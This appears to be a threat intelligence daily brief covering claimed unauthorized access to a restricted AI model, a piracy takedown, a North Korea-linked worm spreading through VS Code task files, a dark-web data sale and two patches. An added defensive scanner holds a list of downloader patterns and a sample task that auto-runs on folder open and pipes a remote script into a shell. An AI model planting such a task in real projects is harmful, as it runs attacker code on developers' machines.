ZeroFox Daily Intelligence Brief - April 23, 2026
by Alpha Team

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- Group Claims Unauthorized Access to Anthropic’s Claude Mythos
- Spanish Authorities Dismantle Major Manga Piracy Platform
- “Contagious Interview” Evolves into Self-Propagating Supply Chain Threat
Group Claims Unauthorized Access to Anthropic’s Claude Mythos
Source: https://www.bbc.com/news/articles/cy41zejp9pko
What we know: Anthropic is reportedly investigating claims of unauthorized access to its Claude Mythos model via a third-party vendor. On a private Discord channel, a group claimed to have accessed the restricted cybersecurity AI tool, reportedly presenting screenshots and a live demonstration of the platform as evidence.
Context: The group says it is exploring new AI models and does not intend to misuse the Mythos tool. Anthropic reports no malicious activity. Claude Mythos has been released only to select organizations for testing, as the company says the tool could be abused to supercharge cyberattacks by discovering previously unknown vulnerabilities.
Analyst note: The unauthorized access raises concerns about Anthropic’s safeguards against misuse, but the incident likely stems from activist researchers or whistleblowers rather than threat-actor activity. Insider threats, including those introduced through contracting entities and other third parties in the access chain, are very likely to emerge as a key risk for upcoming high-capability AI tools.
Spanish Authorities Dismantle Major Manga Piracy Platform
What we know: Spanish authorities have dismantled a major manga piracy operation called Tu Manga Online, arresting multiple suspects and seizing infrastructure and cryptocurrency assets.
Context: The site had operated since 2014, offering free access to copyrighted manga and attracting millions of global users. It generated over USD 4.7 million through aggressive, often explicit, advertising.
Analyst note: It is likely that new mirror or successor platforms will emerge, with any remaining members shifting monetization and promotion to less visible channels, such as encrypted messaging apps like Telegram and deep web forums. They may also adopt more controlled distribution models, such as private communities or invite-only platforms, to reduce enforcement exposure while sustaining their user base.
“Contagious Interview” Evolves into Self-Propagating Supply Chain Threat
What we know: The North Korea-linked Contagious Interview campaign has evolved into a worm-like supply chain attack in which compromised developer repositories propagate malware via malicious Visual Studio Code task configurations. Infected projects on platforms such as GitHub spread remote access trojans and other payloads downstream, turning each new victim into a distributor across the software ecosystem.
Context: The campaign has moved beyond single-target social engineering to broad compromise of organizations through the developer ecosystem. The activity is attributed to the North Korea-linked “Void Dokkaebi,” which targets developers and steals high-value credentials. Void Dokkaebi has infected over 750 code repositories, deploying more than 500 malicious Visual Studio Code task configurations.
Analyst note: In the near term, the campaign is likely to scale rapidly and diversify its execution vectors beyond Visual Studio Code, leveraging stolen credentials and trusted code-signing mechanisms to make propagation stealthier, more persistent, and harder to detect.
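One check a defender can run against a cloned repository, added here as an example and not part of the brief or of the researchers’ reporting: scan every .vscode/tasks.json for tasks that VS Code can start without a user clicking anything (runOptions.runOn set to folderOpen, a documented VS Code feature) and whose command looks like a downloader or an inline interpreter. The suspicious-command patterns and the two sample tasks.json files below are constructed assumptions for illustration, not indicators taken from the campaign. VS Code only runs automatic tasks in a workspace the user has marked trusted, so Workspace Trust remains the first-line control; this scan is for checkouts that have already been trusted, or for a CI gate on incoming repositories.

```python
"""Scan VS Code task configurations for auto-run tasks that execute shell
commands. Added example for this brief, not ZeroFox's or the researchers'
tooling. The sample tasks.json documents and the command heuristics are
constructed assumptions, not indicators from the reported campaign."""
import json
import re
from pathlib import Path

# Commands an auto-running task in a freshly cloned repository has little
# legitimate reason to run. Assumed heuristics, not campaign indicators.
SUSPICIOUS_PATTERNS = [
    r"\bcurl\b", r"\bwget\b", r"\bInvoke-WebRequest\b", r"\biwr\b",
    r"\bIEX\b", r"\bInvoke-Expression\b", r"\bbase64\b",
    r"\bnode\s+-e\b", r"\bpython3?\s+-c\b", r"\|\s*(ba)?sh\b",
    r"\beval\b", r"\bcertutil\b", r"\bbitsadmin\b",
]


def strip_jsonc(text: str) -> str:
    """tasks.json is JSON-with-comments; drop // line comments and trailing commas."""
    no_comments = re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)
    return re.sub(r",(\s*[}\]])", r"\1", no_comments)


def task_command(task: dict) -> str:
    """Flatten command + args, including per-OS overrides, into one searchable string."""
    parts = []
    for scope in (task, task.get("windows", {}), task.get("linux", {}), task.get("osx", {})):
        cmd = scope.get("command", "")
        parts.append(cmd if isinstance(cmd, str) else json.dumps(cmd))
        for arg in scope.get("args", []):
            parts.append(arg if isinstance(arg, str) else json.dumps(arg))
    return " ".join(p for p in parts if p)


def scan_tasks_json(text: str):
    """Return one finding per task that auto-runs or looks like a downloader."""
    try:
        doc = json.loads(strip_jsonc(text))
    except json.JSONDecodeError as exc:
        return [{"label": "<parse error>", "command": "", "reasons": [f"unparseable tasks.json: {exc}"]}]
    if not isinstance(doc, dict):
        return []
    findings = []
    for task in doc.get("tasks", []):
        reasons = []
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            reasons.append("auto-runs on folder open (runOptions.runOn=folderOpen)")
        cmd = task_command(task)
        hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, cmd, re.IGNORECASE)]
        if hits:
            reasons.append("suspicious command content: " + ", ".join(hits))
        # A hidden terminal is only worth reporting alongside one of the above.
        if reasons and task.get("presentation", {}).get("reveal") == "never":
            reasons.append("terminal output hidden (presentation.reveal=never)")
        if reasons:
            findings.append({"label": task.get("label", "<unnamed>"), "command": cmd, "reasons": reasons})
    return findings


def scan_repo(root: str):
    """Walk a checkout and scan every .vscode/tasks.json beneath it."""
    return {
        str(path): scan_tasks_json(path.read_text(encoding="utf-8", errors="replace"))
        for path in Path(root).rglob(".vscode/tasks.json")
    }


# Constructed samples: an ordinary build task, and a task that both auto-runs
# and pipes a remote script into a shell with its terminal hidden.
BENIGN_TASKS = """{
    // See https://go.microsoft.com/fwlink/?LinkId=733558
    "version": "2.0.0",
    "tasks": [
        { "label": "build", "type": "shell", "command": "npm run build", "group": "build" },
    ]
}"""

SUSPICIOUS_TASKS = """{
    "version": "2.0.0",
    "tasks": [
        {
            "label": "install deps",
            "type": "shell",
            "command": "curl -fsSL https://example.invalid/setup.sh | sh",
            "runOptions": { "runOn": "folderOpen" },
            "presentation": { "reveal": "never" }
        }
    ]
}"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_TASKS), ("suspicious", SUSPICIOUS_TASKS)):
        print(name, json.dumps(scan_tasks_json(sample), indent=2))
```

Run scan_repo on the root of a checkout to get a mapping of each tasks.json path to its findings; an empty list for a path means nothing auto-runs and nothing matched the patterns, which is a reasonable gate before marking the workspace trusted.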
DEEP AND DARK WEB INTELLIGENCE
DarkForums user SumudCyberCommand: Untested threat actor "SumudCyberCommand" has advertised a 15 TB dataset allegedly associated with the Institute for National Security Studies in Israel on the deep web forum DarkForums. The dataset is priced at USD 800 and includes a sample. It allegedly contains detailed maps of Iran’s aviation smuggling, WhatsApp chat exports of senior Israeli politicians, internal emails, classified policy papers on Gaza, and more. The claims are likely part of psychological operations against Israel intended to undermine public confidence and trigger panic. The data likely consists of low-sensitivity or publicly available information rather than classified material.
VULNERABILITY AND EXPLOIT INTELLIGENCE
CVE-2026-40372: Microsoft has released an out-of-band (OOB) security patch for a critical privilege escalation vulnerability in the ASP.NET Core Data Protection cryptographic APIs. The flaw enables attackers to gain SYSTEM privileges by forging authentication cookies. Successful exploitation is likely to enable further lateral movement within a network, but first requires initial access, such as compromised credentials. Threat actors are then likely able to steal files and modify data, leading to data breaches or corruption of information.
Affected products: ASP.NET Core version 10.0
CVE-2026-28950: Apple has released an OOB security patch for iPhones and iPads to prevent notifications marked for deletion from being stored on the device. The vulnerability was described as a logging issue and was patched with improved data redaction. The patch almost certainly aims to fix a privacy issue and to retain customer confidence in the security of Apple devices.
Affected products: The affected products are listed in this advisory.
Tags: DIB, tlp:green